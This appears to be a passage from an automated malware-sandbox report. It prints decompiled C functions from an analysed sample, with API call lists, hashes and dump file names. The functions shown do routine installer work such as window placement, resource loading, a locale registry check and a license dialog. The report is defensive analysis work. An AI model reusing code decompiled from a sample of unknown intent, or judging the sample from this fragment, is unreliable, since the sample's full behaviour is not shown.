                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2af2
                                                                                                                                                                                                                                                0x010e2afc
                                                                                                                                                                                                                                                0x010e2b00
                                                                                                                                                                                                                                                0x010e2b05
                                                                                                                                                                                                                                                0x010e2b05
                                                                                                                                                                                                                                                0x010e2b0b
                                                                                                                                                                                                                                                0x010e2bca
                                                                                                                                                                                                                                                0x010e2bd1
                                                                                                                                                                                                                                                0x010e2b11
                                                                                                                                                                                                                                                0x010e2b18
                                                                                                                                                                                                                                                0x010e2b26
                                                                                                                                                                                                                                                0x010e2b99
                                                                                                                                                                                                                                                0x010e2bc8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2b9b
                                                                                                                                                                                                                                                0x010e2bae
                                                                                                                                                                                                                                                0x010e2bb3
                                                                                                                                                                                                                                                0x010e2bb5
                                                                                                                                                                                                                                                0x010e2bb5
                                                                                                                                                                                                                                                0x010e2bb8
                                                                                                                                                                                                                                                0x010e2bb8
                                                                                                                                                                                                                                                0x010e2bba
                                                                                                                                                                                                                                                0x010e2bbb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2bb8
                                                                                                                                                                                                                                                0x010e2b28
                                                                                                                                                                                                                                                0x010e2b2e
                                                                                                                                                                                                                                                0x010e2b33
                                                                                                                                                                                                                                                0x010e2b39
                                                                                                                                                                                                                                                0x010e2b3c
                                                                                                                                                                                                                                                0x010e2b3c
                                                                                                                                                                                                                                                0x010e2b3e
                                                                                                                                                                                                                                                0x010e2b3f
                                                                                                                                                                                                                                                0x010e2b55
                                                                                                                                                                                                                                                0x010e2b5d
                                                                                                                                                                                                                                                0x010e2b64
                                                                                                                                                                                                                                                0x010e2b64
                                                                                                                                                                                                                                                0x010e2b7a
                                                                                                                                                                                                                                                0x010e2b7f
                                                                                                                                                                                                                                                0x010e2b81
                                                                                                                                                                                                                                                0x010e2b81
                                                                                                                                                                                                                                                0x010e2b84
                                                                                                                                                                                                                                                0x010e2b84
                                                                                                                                                                                                                                                0x010e2b86
                                                                                                                                                                                                                                                0x010e2b87
                                                                                                                                                                                                                                                0x010e2bbf
                                                                                                                                                                                                                                                0x010e2bc1
                                                                                                                                                                                                                                                0x010e2bc1
                                                                                                                                                                                                                                                0x010e2b26
                                                                                                                                                                                                                                                0x010e2bda
                                                                                                                                                                                                                                                0x010e2bda
                                                                                                                                                                                                                                                0x010e2be6
                                                                                                                                                                                                                                                0x010e2be6
                                                                                                                                                                                                                                                0x010e2bf8

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 010E2AE6
                                                                                                                                                                                                                                                • IsDBCSLeadByte.KERNEL32(00000000), ref: 010E2AF2
                                                                                                                                                                                                                                                • CharNextA.USER32(?), ref: 010E2B12
                                                                                                                                                                                                                                                • CharUpperA.USER32 ref: 010E2B1E
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,?), ref: 010E2B55
                                                                                                                                                                                                                                                • CharNextA.USER32(?), ref: 010E2BD4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 571164536-0
                                                                                                                                                                                                                                                • Opcode ID: fa29d2d9df99b0b41dabfe9086007ceda3444729974de75fbe9adb075061029f
                                                                                                                                                                                                                                                • Instruction ID: 2f965684977c52619089d0fd4a2bd4a22441e97f96c73496c354bb14075210b0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa29d2d9df99b0b41dabfe9086007ceda3444729974de75fbe9adb075061029f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87412A346042459FDF669F399858AFE7FED9F56710F0440DAD8C287202DB7A8A86CB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E43D0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E010E43D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x10e8004; // 0x71a8563c
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E010E6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}
























                                                                                                                                                                                                                                                0x010e43d0
                                                                                                                                                                                                                                                0x010e43d8
                                                                                                                                                                                                                                                0x010e43df
                                                                                                                                                                                                                                                0x010e43e6
                                                                                                                                                                                                                                                0x010e43ec
                                                                                                                                                                                                                                                0x010e43f1
                                                                                                                                                                                                                                                0x010e4400
                                                                                                                                                                                                                                                0x010e4403
                                                                                                                                                                                                                                                0x010e440b
                                                                                                                                                                                                                                                0x010e4420
                                                                                                                                                                                                                                                0x010e4429
                                                                                                                                                                                                                                                0x010e4437
                                                                                                                                                                                                                                                0x010e4444
                                                                                                                                                                                                                                                0x010e4447
                                                                                                                                                                                                                                                0x010e444d
                                                                                                                                                                                                                                                0x010e4454
                                                                                                                                                                                                                                                0x010e445b
                                                                                                                                                                                                                                                0x010e4460
                                                                                                                                                                                                                                                0x010e4461
                                                                                                                                                                                                                                                0x010e4467
                                                                                                                                                                                                                                                0x010e446f
                                                                                                                                                                                                                                                0x010e4473
                                                                                                                                                                                                                                                0x010e4473
                                                                                                                                                                                                                                                0x010e4463
                                                                                                                                                                                                                                                0x010e4463
                                                                                                                                                                                                                                                0x010e4463
                                                                                                                                                                                                                                                0x010e447a
                                                                                                                                                                                                                                                0x010e4481
                                                                                                                                                                                                                                                0x010e4484
                                                                                                                                                                                                                                                0x010e448a
                                                                                                                                                                                                                                                0x010e4492
                                                                                                                                                                                                                                                0x010e4496
                                                                                                                                                                                                                                                0x010e4496
                                                                                                                                                                                                                                                0x010e4486
                                                                                                                                                                                                                                                0x010e4486
                                                                                                                                                                                                                                                0x010e4486
                                                                                                                                                                                                                                                0x010e44b8

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 010E43F1
                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 010E440B
                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 010E4423
                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 010E442E
                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 010E443A
                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 010E4447
                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 010E44A2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2212493051-0
                                                                                                                                                                                                                                                • Opcode ID: 4ace18785a46217f4d1d0201574a26dc217fd01f46e1c51f2f93f65f078baaf6
                                                                                                                                                                                                                                                • Instruction ID: ecde2537c1f88f6fa82452bbc0cac5a42fa33f7532612b1cf4cf0980da97df34
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ace18785a46217f4d1d0201574a26dc217fd01f46e1c51f2f93f65f078baaf6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18313872F00119AFCB24CEB9D9889EEBBF5EB89310F154169F845F7244DA35AD058B60
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E6298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 53%
                                                                                                                                                                                                                                                			E010E6298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x10e8004; // 0x71a8563c
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E010E171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x10e9124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x10ea288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E010E171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E010E6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}






















                                                                                                                                                                                                                                                0x010e6298
                                                                                                                                                                                                                                                0x010e62a0
                                                                                                                                                                                                                                                0x010e62a7
                                                                                                                                                                                                                                                0x010e62ad
                                                                                                                                                                                                                                                0x010e62af
                                                                                                                                                                                                                                                0x010e62bb
                                                                                                                                                                                                                                                0x010e62c3
                                                                                                                                                                                                                                                0x010e62c4
                                                                                                                                                                                                                                                0x010e633b
                                                                                                                                                                                                                                                0x010e633b
                                                                                                                                                                                                                                                0x010e6345
                                                                                                                                                                                                                                                0x010e634d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e62da
                                                                                                                                                                                                                                                0x010e62de
                                                                                                                                                                                                                                                0x010e635f
                                                                                                                                                                                                                                                0x010e6369
                                                                                                                                                                                                                                                0x010e62e0
                                                                                                                                                                                                                                                0x010e62e0
                                                                                                                                                                                                                                                0x010e62e0
                                                                                                                                                                                                                                                0x010e62e3
                                                                                                                                                                                                                                                0x010e62e5
                                                                                                                                                                                                                                                0x010e62e5
                                                                                                                                                                                                                                                0x010e62e8
                                                                                                                                                                                                                                                0x010e62e8
                                                                                                                                                                                                                                                0x010e62ea
                                                                                                                                                                                                                                                0x010e62eb
                                                                                                                                                                                                                                                0x010e62ef
                                                                                                                                                                                                                                                0x010e62f1
                                                                                                                                                                                                                                                0x010e62f3
                                                                                                                                                                                                                                                0x010e6302
                                                                                                                                                                                                                                                0x010e6308
                                                                                                                                                                                                                                                0x010e630d
                                                                                                                                                                                                                                                0x010e6314
                                                                                                                                                                                                                                                0x010e6314
                                                                                                                                                                                                                                                0x010e6316
                                                                                                                                                                                                                                                0x010e6319
                                                                                                                                                                                                                                                0x010e6355
                                                                                                                                                                                                                                                0x010e6357
                                                                                                                                                                                                                                                0x010e631b
                                                                                                                                                                                                                                                0x010e631b
                                                                                                                                                                                                                                                0x010e6331
                                                                                                                                                                                                                                                0x010e6334
                                                                                                                                                                                                                                                0x010e6339
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e6339
                                                                                                                                                                                                                                                0x010e6319
                                                                                                                                                                                                                                                0x010e636b
                                                                                                                                                                                                                                                0x010e637d
                                                                                                                                                                                                                                                0x010e637d
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E171E: _vsnprintf.MSVCRT ref: 010E1750
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,010E51CA,00000004,00000024,010E2F71,?,00000002,00000000), ref: 010E62CD
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,010E51CA,00000004,00000024,010E2F71,?,00000002,00000000), ref: 010E62D4
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010E51CA,00000004,00000024,010E2F71,?,00000002,00000000), ref: 010E631B
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 010E6345
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010E51CA,00000004,00000024,010E2F71,?,00000002,00000000), ref: 010E6357
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                                • String ID: UPDFILE%lu
                                                                                                                                                                                                                                                • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                                • Opcode ID: ba28c72fd0ede3290bb8f04715861c7cc36f0b27e735b2d00191c4377f3c5b1d
                                                                                                                                                                                                                                                • Instruction ID: fa70b6d9081c06f71061de806adb5c9ced505f12710a3fc29d87007f8aec0191
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba28c72fd0ede3290bb8f04715861c7cc36f0b27e735b2d00191c4377f3c5b1d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C21D875B00219AFDB209F66EC499FE7BF8FB48B54F004159F982A7201D73B99018BE0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E010E681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x10e8004; // 0x71a8563c
				_v8 = _t19 ^ _t44;
				_t41 =  *0x10e81d8; // 0xfffffffe
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x10e81d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x10e81d8; // 0xfffffffe
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x10e1140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E010E66F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x10e81d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E010E6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}


















                                                                                                                                                                                                                                                0x010e681f
                                                                                                                                                                                                                                                0x010e682a
                                                                                                                                                                                                                                                0x010e6831
                                                                                                                                                                                                                                                0x010e6836
                                                                                                                                                                                                                                                0x010e683c
                                                                                                                                                                                                                                                0x010e683e
                                                                                                                                                                                                                                                0x010e6848
                                                                                                                                                                                                                                                0x010e6851
                                                                                                                                                                                                                                                0x010e685d
                                                                                                                                                                                                                                                0x010e6864
                                                                                                                                                                                                                                                0x010e6876
                                                                                                                                                                                                                                                0x010e693a
                                                                                                                                                                                                                                                0x010e693a
                                                                                                                                                                                                                                                0x010e687c
                                                                                                                                                                                                                                                0x010e687e
                                                                                                                                                                                                                                                0x010e6885
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e68d6
                                                                                                                                                                                                                                                0x010e68f4
                                                                                                                                                                                                                                                0x010e6900
                                                                                                                                                                                                                                                0x010e6902
                                                                                                                                                                                                                                                0x010e690a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e690c
                                                                                                                                                                                                                                                0x010e690c
                                                                                                                                                                                                                                                0x010e691c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e691e
                                                                                                                                                                                                                                                0x010e6924
                                                                                                                                                                                                                                                0x010e692b
                                                                                                                                                                                                                                                0x010e6932
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e692b
                                                                                                                                                                                                                                                0x010e691c
                                                                                                                                                                                                                                                0x010e690a
                                                                                                                                                                                                                                                0x010e6885
                                                                                                                                                                                                                                                0x010e6876
                                                                                                                                                                                                                                                0x010e6951

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010E686E
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000004A), ref: 010E68A7
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010E68CC
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,010E1140,00000000,?,?,0000000C), ref: 010E68F4
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 010E6902
                                                                                                                                                                                                                                                  • Part of subcall function 010E66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,010E691A), ref: 010E6741
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Control Panel\Desktop\ResourceLocale, xrefs: 010E68C2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                                • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                                • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                                • Opcode ID: 1b0edee3015ad3f2800fd3f259a8683bab04114b5362fefe00ca5bcb80b58153
                                                                                                                                                                                                                                                • Instruction ID: 1aafdf3dd6fe0cc0fc6f56041b3108577f3b046d595df7e97bad8652fd736277
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b0edee3015ad3f2800fd3f259a8683bab04114b5362fefe00ca5bcb80b58153
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59318231A40218DFDB31CB17EC48BEA7BFCEB55764F0041D5E989AA240D73699858F51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E3A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memorystringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E3A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E010E468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x10e8d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E010E468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x10e8d4c, "<None>") == 0) {
							LocalFree( *0x10e8d4c);
							L9:
							 *0x10e9124 = 0;
							return 1;
						}
						_t9 = E010E6517(_t19, 0x7d1, 0, E010E3100, 0, 0);
						LocalFree( *0x10e8d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x10e9124 = 0x800704c7;
						L2:
						return 0;
					}
					E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x10e8d4c);
					 *0x10e9124 = 0x80070714;
					goto L2;
				}
				E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x10e9124 = E010E6285();
				goto L2;
			}






                                                                                                                                                                                                                                                0x010e3a46
                                                                                                                                                                                                                                                0x010e3a57
                                                                                                                                                                                                                                                0x010e3a5d
                                                                                                                                                                                                                                                0x010e3a63
                                                                                                                                                                                                                                                0x010e3a6a
                                                                                                                                                                                                                                                0x010e3a91
                                                                                                                                                                                                                                                0x010e3a9a
                                                                                                                                                                                                                                                0x010e3ad8
                                                                                                                                                                                                                                                0x010e3b13
                                                                                                                                                                                                                                                0x010e3b19
                                                                                                                                                                                                                                                0x010e3b1b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3b21
                                                                                                                                                                                                                                                0x010e3ae7
                                                                                                                                                                                                                                                0x010e3af4
                                                                                                                                                                                                                                                0x010e3afc
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3afe
                                                                                                                                                                                                                                                0x010e3a87
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3a87
                                                                                                                                                                                                                                                0x010e3aa8
                                                                                                                                                                                                                                                0x010e3ab3
                                                                                                                                                                                                                                                0x010e3ab9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3ab9
                                                                                                                                                                                                                                                0x010e3a78
                                                                                                                                                                                                                                                0x010e3a82
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010E2F64,?,00000002,00000000), ref: 010E3A5D
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 010E3AB3
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                  • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(<None>,00000000), ref: 010E3AD0
                                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 010E3B13
                                                                                                                                                                                                                                                  • Part of subcall function 010E6517: FindResourceA.KERNEL32(010E0000,000007D6,00000005), ref: 010E652A
                                                                                                                                                                                                                                                  • Part of subcall function 010E6517: LoadResource.KERNEL32(010E0000,00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010E6538
                                                                                                                                                                                                                                                  • Part of subcall function 010E6517: DialogBoxIndirectParamA.USER32(010E0000,00000000,00000547,010E19E0,00000000), ref: 010E6557
